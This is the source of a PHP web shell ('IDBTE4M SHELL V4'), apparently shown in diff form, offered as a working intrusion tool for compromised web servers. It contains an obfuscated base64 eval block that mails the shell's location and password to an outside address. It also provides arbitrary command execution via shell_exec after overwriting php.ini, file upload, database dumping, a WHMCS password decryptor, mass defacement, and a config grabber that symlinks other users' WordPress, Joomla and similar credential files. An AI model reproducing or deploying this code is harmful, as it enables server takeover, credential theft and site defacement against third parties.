7/Ez7f/AA==";
- eval(base64_decode("JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQokdmlzaXRjID0gMDsNCiR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KJGp1ZHVsID0gIlJFU1VMVCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQokYm9keSA9ICJSZXN1bHQ6ICR0YXJnZXQgYnkgJHZpc2l0b3IgIFxuIHBhc3N3b3JkIC0gJGF1dGhfcGFzcyI7DQppZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJqZW1idXRrYXU0OUBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"));
- $jumper="fVJtb5swEP4rF4Rko7Ka7WMCpFLVfp20fWwrarA9PAFGtlmXVfvvuwtN1mjShEDmebl77kB3vYOkjLIdNHSDDKF6TLpRte7nY1KX0eOtoHNDmOWE1CdEkx3wNIxQgZ1s801HzoI0uhmd0iyDqoIigz2sEuaMYVtQVvPkznvnt/D1JEb681SKqGp8eHpQjLpU9sc5y3d5kJREIFgn2Q6Cjk20o24GO9rIC4Ru0hnFLwrrGTfriTOhYydWkOXMMxRZA3zzJszglRIBTx4+PMExFmzh1i1qeo7wRUsF7yr8m5By/IZ0XlpsKb2XB45IugTtwwXSuclcABbfih289HbQfGO0M/yUKXvFlUVPQ+BOwxlfo6Ozho9FQarZURfU4oGTJ2dbdgowyZEWG5YWiZUtcrKQQFn/iz6K6N2oBbs+O66ZwGkG2zV9HAfB1qb8b8UNuhhlJNyGxuOSaBf8WJOI45DNvIR+tYX87MbW71nslK82WiNdqb26orNxWLfr4a0CyLAOheU1/ans4d4tk4LNE5QSeq9NlewP1cU4l6Mk9X9IUQpZl62vGTXf138A";
- $ekse="eJyVk21r2zAQx9/vUxwiUIcFF8beLCWsoXFwRx+M422MtphzfXUUP2LJLdun30mOU9qalaEXEnc//U+6vzRRWfJpAWJHZdLpHLvPX06zEmXh3telOPkwkQ0sICNN1aMjQu/yOvLi5WoViiknt7XSNmsWFZbkTO0WBYdo8tvGLWqSitpHajk/iTde+MMLb476Ob5aXnpHdwYx7AvCj6Ig9q83kc03mNEVizKSoKJe/1ntLDwPor2aqZjKF+VE4Ae8vlgL1kpRU5zSA3aFjrUs6U9dUaxIO2KpJB5/wxxbjfayhmUhMzkihTX8smGz6xD253KubLgkpfic4HJzFx//PeAGvjdFjSk3JiTFZ4E7eGePGbeVeFXprJBUaTgPYA7CZSdc8Rba9BY8Q2qM8tkE22ULGUvGqFXNj6Xqmd7aMeqCNObQDXe0NNviimNeDHa64usO8xab5q1AhFWWYbHfya0eq/ITc90B5YryTsmeNe68Yg0aoFJPdZvCZktFAdDD2Olt3HBqTP19O9hGWPH7gf9xT3XJju7NcxeHN7DvpElvyUTMfxLrti7nIKuH+hQrLZNau83TbWtlzI91JuYvzwbF2XD62SAyPfkLBNIljA==";
- ?>
- <html><head><link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png"><title>-=[ IDBTE4M SHELL V4 ]=-</title>
- <script type="text/javascript">
- function tukar(lama,baru){
- document.getElementById(lama).style.display = 'none';
- document.getElementById(baru).style.display = 'block';
- }
- </script>
- <style type="text/css">
- body{
- background:#000000;;
- }
- a {
- text-decoration:none;
- }
- a:hover{
- border-bottom:1px solid #FF0000;
- }
- *{
- font-size:11px;
- font-family:Tahoma,Verdana,Arial;
- color:#FFFFFF;
- }
- #menu{
- background:#000000;
- margin:8px 2px 4px 2px;
- }
- #menu a{
- padding:4px 18px;
- margin:0;
- background:#c40909;
- text-decoration:none;
- letter-spacing:2px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- #menu a:hover{
- background:#6a0707;
- border-bottom:1px solid #c40909;
- border-top:1px solid #c40909;
- }
- .tabnet{
- margin:15px auto 0 auto;
- border: 1px solid #c40909;
- }
- .main {
- width:100%;
- }
- .gaya {
- color: #FF0000;
- }
- .inputz{
- background:#6a0707;
- border:0;
- padding:2px;
- border-bottom:1px solid #c40909;
- border-top:1px solid #c40909;
- }
- .inputzbut{
- background:#6a0707;
- color:#ff000;
- margin:0 4px;
- border:1px solid #444444;
- }
- .inputz:hover, .inputzbut:hover{
- border-bottom:1px solid #FF0000;
- border-top:1px solid #FF0000;
- }
- .output {
- margin:auto;
- border:1px solid #FF0000;
- width:100%;
- height:400px;
- background:#000000;
- padding:0 2px;
- }
- .cmdbox{
- width:100%;
- }
- .head_info{
- padding: 0 4px;
- float:center;
- }
- .jaya{ font-family: ;}
- .b374k{
- font-size:30px;
- padding:0;
- color:#444444;
- }
- .b374k_tbl{
- text-align:center;
- margin:0 4px 0 0;
- padding:0 4px 0 0;
- border-right:1px solid #c40909;
- }
- .phpinfo table{
- width:100%;
- padding:0 0 0 0;
- }
- .phpinfo td{
- background:#6a0707;
- color:#cccccc;
- padding:6px 8px;;
- }
- .phpinfo th, th{
- background:#6a0707;
- border-bottom:1px solid #c40909;
- font-weight:normal;
- }
- .phpinfo h2, .phpinfo h2 a{
- text-align:center;
- font-size:16px;
- padding:0;
- margin:30px 0 0 0;
- background:#c40909;
- padding:4px 0;
- }
- .explore{
- width:100%;
- }
- .explore a {
- text-decoration:none;
- }
- .explore td{
- border-bottom:1px solid #c40909;
- padding:0 8px;
- line-height:24px;
- }
- .explore th{
- padding:3px 8px;
- font-weight:normal;
- }
- .explore th:hover , .phpinfo th:hover{
- border-bottom:1px solid #FF0000;
- }
- .explore tr:hover{
- background:#6a0707;
- }
- .viewfile{
- background:#EDECEB;
- color:#000000;
- margin:4px 2px;
- padding:8px;
- }
- .sembunyi{
- display:none;
- padding:0;margin:0;
- }
- </style></head>
- <body onLoad="document.getElementById('cmd').focus();">
- <div class="main">
- <!-- head info start here -->
- <div class="head_info">
- <table ><tr>
- <td><table class="b374k_tbl"><tr><td><a href="?<?php echo "y=".$pwd; ?>&x=about"><span class="b374k"><img src="http://kefiex.yu.tl/files/bnx.png" /></span></a></td></tr><br>
- <div id="menu" align="left">
- <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
- <td><!-- onMouseOver="this.focus();" --><nobr><input type="file" name="file" class="inputz" size="50">
- <input name="_upl" type="submit" id="_upl" class="inputz" value="Upload"></form></div></b></td></tr></table></td>
- <td><?php echo $buff; ?></td>
- </td>
- </tr>
- </tr></table>
- </div>
- <div id="menu" align="center">
- <font color=red size=2 face="TAHOMA">
- <p align="center" dir="ltr"> <hr><center>
- <font color="red" font size=3 > | <font color="white" font size=3 >
- <a href="?" style="text-decoration: none">
- Home </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=sql" style="text-decoration: none">
- SQL </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=cp" style="text-decoration: none">
- Cpanel Cracker </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=jump" style="text-decoration: none">
- Jumping </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?x=maling" style="text-decoration: none">
- Maling Script </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <br><hr><center>
- <font color="red" font size=3 > |</font>
- <a href="?jak=auto" style="text-decoration: none">
- Auto Wget </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=config" style="text-decoration: none">
- Config Grabber </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=wp2" style="text-decoration: none">
- Config Auto Get </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=zonh" style="text-decoration: none">
- Zon-H </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
- <a href="?jak=mass" style="text-decoration: none">
- Mass Deface </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 >|</font>
- <hr>
- <font color="red" font size=3 >|</font>
- <a href="?jak=brute" style="text-decoration: none">
- Cp Brute </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 >|</font>
- <a href="?jak=finder" style="text-decoration: none">
- Admin Finder </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=sym" style="text-decoration: none">
- Symlink </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=dump" style="text-decoration: none">
- Db Dump </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=has" style="text-decoration: none">
- Password Hash </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=whmcs" style="text-decoration: none">
- Whmcs Decoder </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=wpp" style="text-decoration: none">
- Wp Mass </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <hr>
- <font color="red" font size=3 >|</font>
- <a href="?jak=jomla" style="text-decoration: none">
- Jomla Mass </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- <a href="?jak=wpmas" style="text-decoration: none">
- Wp Mass Manual </a> <font color="white" font size=3 ></font>
- <font color="red" font size=3 > |</font>
- </td><hr></center>
- </tr></table></div>
- <div id="viewfile" align="left">
- <form method="post">
- <td><nobr><b>CMD</b></nobr></td>
- <td><!-- onMouseOver="this.focus();" --><nobr><input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
- <input class="inputzbut" type="submit" value=" >> " style="width:50px;" />
- </form>
- <?php
- if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
- else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
- }
- ?>
- <?php
- /*******************************************\
- | CMD linux DTT 2014
- \*******************************************/
- $x0f = "fopen";
- $x10 = "fwrite";
- $x11 = "function_exists";
- $x12 = "shell_exec";
- if (isset($_POST['cmd'])) {
- $x0b = $x0f('php.ini', 'w');
- $x0c = " disable_functions=none ";
- $x10($x0b, $x0c);
- if ($x11('shell_exec')) {
- $x0d = $_POST['cmd'];
- $x0e = $x12("$x0d");
- echo "<div id=result>";
- echo "<span class=Y><pre>$x0e</pre></span";
- }
- echo "</div>";
- }
- ?>
- <center>
- <div id="menu" align="center">
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'dump')) { ?>
- <form action="?jak=dump" method="post">
- <?php
- echo $head.'<p align="center">';
- echo '
- <table width=371 class=tabnet >
- <tr><th colspan="2">Database Dump</th></tr>
- <tr>
- <td>Server </td>
- <td><input class="inputz" type=text name=server size=52></td></tr><tr>
- <td>Username</td>
- <td><input class="inputz" type=text name=username size=52></td></tr><tr>
- <td>Password</td>
- <td><input class="inputz" type=text name=password size=52></td></tr><tr>
- <td>DataBase Name</td>
- <td><input class="inputz" type=text name=dbname size=52></td></tr>
- <tr>
- <td>DB Type </td>
- <td><form method=post action="'.$me.'">
- <select class="inputz" name=method>
- <option value="gzip">Gzip</option>
- <option value="sql">Sql</option>
- </select>
- <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
- </form></center></table>';
- if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
- $date = date("Y-m-d");
- $dbserver = $_POST['server'];
- $dbuser = $_POST['username'];
- $dbpass = $_POST['password'];
- $dbname = $_POST['dbname'];
- $file = "Dump-$dbname-$date";
- $method = $_POST['method'];
- if ($method=='sql'){
- $file="Dump-$dbname-$date.sql";
- $fp=fopen($file,"w");
- }else{
- $file="Dump-$dbname-$date.sql.gz";
- $fp = gzopen($file,"w");
- }
- function write($data) {
- global $fp;
- if ($_POST['method']=='ssql'){
- fwrite($fp,$data);
- }else{
- gzwrite($fp, $data);
- }}
- mysql_connect ($dbserver, $dbuser, $dbpass);
- mysql_select_db($dbname);
- $tables = mysql_query ("SHOW TABLES");
- while ($i = mysql_fetch_array($tables)) {
- $i = $i['Tables_in_'.$dbname];
- $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
- write($create['Create Table'].";\n\n");
- $sql = mysql_query ("SELECT * FROM ".$i);
- if (mysql_num_rows($sql)) {
- while ($row = mysql_fetch_row($sql)) {
- foreach ($row as $j => $k) {
- $row[$j] = "'".mysql_escape_string($k)."'";
- }
- write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
- }
- }
- }
- if ($method=='ssql'){
- fclose ($fp);
- }else{
- gzclose($fp);}
- header("Content-Disposition: attachment; filename=" . $file);
- header("Content-Type: application/download");
- header("Content-Length: " . filesize($file));
- flush();
- $fp = fopen($file, "r");
- while (!feof($fp))
- {
- echo fread($fp, 65536);
- flush();
- }
- fclose($fp);
- }
- }
- elseif(isset($_GET['jak']) && ($_GET['jak'] == 'has'))
- {
- $submit= $_POST['enter'];
- if (isset($submit)) {
- $pass = $_POST['password']; // password
- $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
- $hash = md5($pass); // md5 hash #1
- $md4 = hash("md4",$pass);
- $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
- $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
- $hash1 = sha1($pass); // sha1 hash #4
- $sha256 = hash("sha256",$text);
- $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
- $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
- }
- echo '<form action="" method="post"><b><table class=tabnet>';
- echo '<tr><th colspan="2">Password Hash</th></center></tr>';
- echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
- echo '<td><input class="inputz" type="text" name="password" size="40" />';
- echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
- echo '</td></tr><br>';
- echo '<tr><th colspan="2">Hash Result</th></center></tr>';
- echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
- echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
- echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
- echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
- echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
- echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
- echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
- echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
- echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
- }
- elseif(isset($_GET['jak']) && ($_GET['jak'] == 'whmcs'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&jak=whmcs" method="post">
- <?php
- function decrypt ($string,$cc_encryption_hash)
- {
- $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash ($key);
- $hash_length = strlen ($hash_key);
- $string = base64_decode ($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length)
- {
- $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen ($string))
- {
- if (($c != 0 AND $c % $hash_length == 0))
- {
- $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- }
- $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash ($string)
- {
- if (function_exists ('sha1'))
- {
- $hash = sha1 ($string);
- }
- else
- {
- $hash = md5 ($string);
- }
- $out = '';
- $c = 0;
- while ($c < strlen ($hash))
- {
- $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- echo "
- <br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
- <center>
- <br>
- <FORM action='' method='post'>
- <input type='hidden' name='form_action' value='2'>
- <br>
- <table class=tabnet style=width:320px;padding:0 1px;>
- <tr><th colspan=2>WHMCS Decoder</th></tr>
- <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
- <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
- <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
- <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
- <td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
- </table>
- </FORM>
- </center>
- ";
- if($_POST['form_action'] == 2 )
- {
- //include($file);
- $db_host=($_POST['db_host']);
- $db_username=($_POST['db_username']);
- $db_password=($_POST['db_password']);
- $db_name=($_POST['db_name']);
- $cc_encryption_hash=($_POST['cc_encryption_hash']);
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblservers");
- while($v = mysql_fetch_array($query)) {
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo("<center><table border='1'>");
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>Type</td><td>$type</td></tr>");
- echo("<tr><td>Active</td><td>$active</td></tr>");
- echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
- echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
- echo("<tr><td>Username</td><td>$username</td></tr>");
- echo("<tr><td>Password</td><td>$password</td></tr>");
- echo "</table><br><br></center>";
- }
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblregistrars");
- echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
- echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
- while($v = mysql_fetch_array($query)) {
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt ($v['value'], $cc_encryption_hash);
- if ($value=="") {
- $value=0;
- }
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
- }
- }
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'mass')) { ?>
- <form action="?jak=mass" method="post">
- <?php ?>
- <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <p class="style3">
- <span <ul>
- <span class="style32">
- <span class="style39">
- <span style="font-weight: 700;" class="style33">
- </span></p><br>
- <span style="font-weight: 700;" class="style33">
- <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><br>
- <br>
- </center>
- <div class="style31">
- <center>
- <form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
- <div class="style31">
- [+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
- [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
- <input type='submit' name='execmassdeface' value='Execute'></div>
- </form></td></center>
- <?php
- echo "<center><textarea rows='10' cols='100'>";
- $defaceurl = $_POST['massdefaceurl'];
- $dir = $_POST['massdefacedir'];
- echo $dir . "
- ";
- if (is_dir($dir)) {
- if ($dh = opendir($dir)) {
- while (($file = readdir($dh)) !== false) {
- if (filetype($dir . $file) == "dir") {
- $newfile = $dir . $file . "/jek.php";
- echo $newfile . "
- ";
- if (!copy($defaceurl, $newfile)) {
- echo "failed to copy $file...
- ";
- }
- }
- }
- closedir($dh);
- }
- }
- echo "</textarea></center>";
- }
- ?>
- <?php
- // SHELL IDBTE4M V2
- // BY ./KEFIEX404 IDBTE4M
- set_time_limit(0);
- error_reporting(0);
- $htcs = "
- hacked by shamp0erna99";
- $f =@fopen ('index.txt','w');
- fwrite($f , $htcs);
- $pg = basename(__FILE__);
- $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageURL );
- $pageURL =str_replace($u[count($u)-1],"",$pageURL );
- $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageFTP );
- $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'config')) {
- ?>
- <form action="?&jak=config" method="post">
- <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- echo '<form method="POST"><textarea cols="30" name="passwd" rows="10">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
- </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
- <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt</option><option title="type php" value=".php">.php</option><option title="type shtml" value=".shtml">.shtml</option><option title="type ini" value=".ini">.ini</option></select>
- <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
- <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- if ($_POST['conf']) {
- $folfig = $_POST['folfig']; $type = $_POST['type'];
- $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf Bosq fitur Symlink masih di disabled :( </blink>');}
- @mkdir($folfig, 0755);
- @chdir($folfig);
- $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex jak.phtml\nAddType txt .php\nAddHandler txt .php";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya bosq ...</center></blink>";
- foreach($passwd as $pwd){ $user=trim($pwd);
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
- @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
- @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
- @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
- @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
- @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
- @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
- @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
- @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
- @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
- @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
- @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
- @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
- @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
- @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
- @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
- @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
- @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
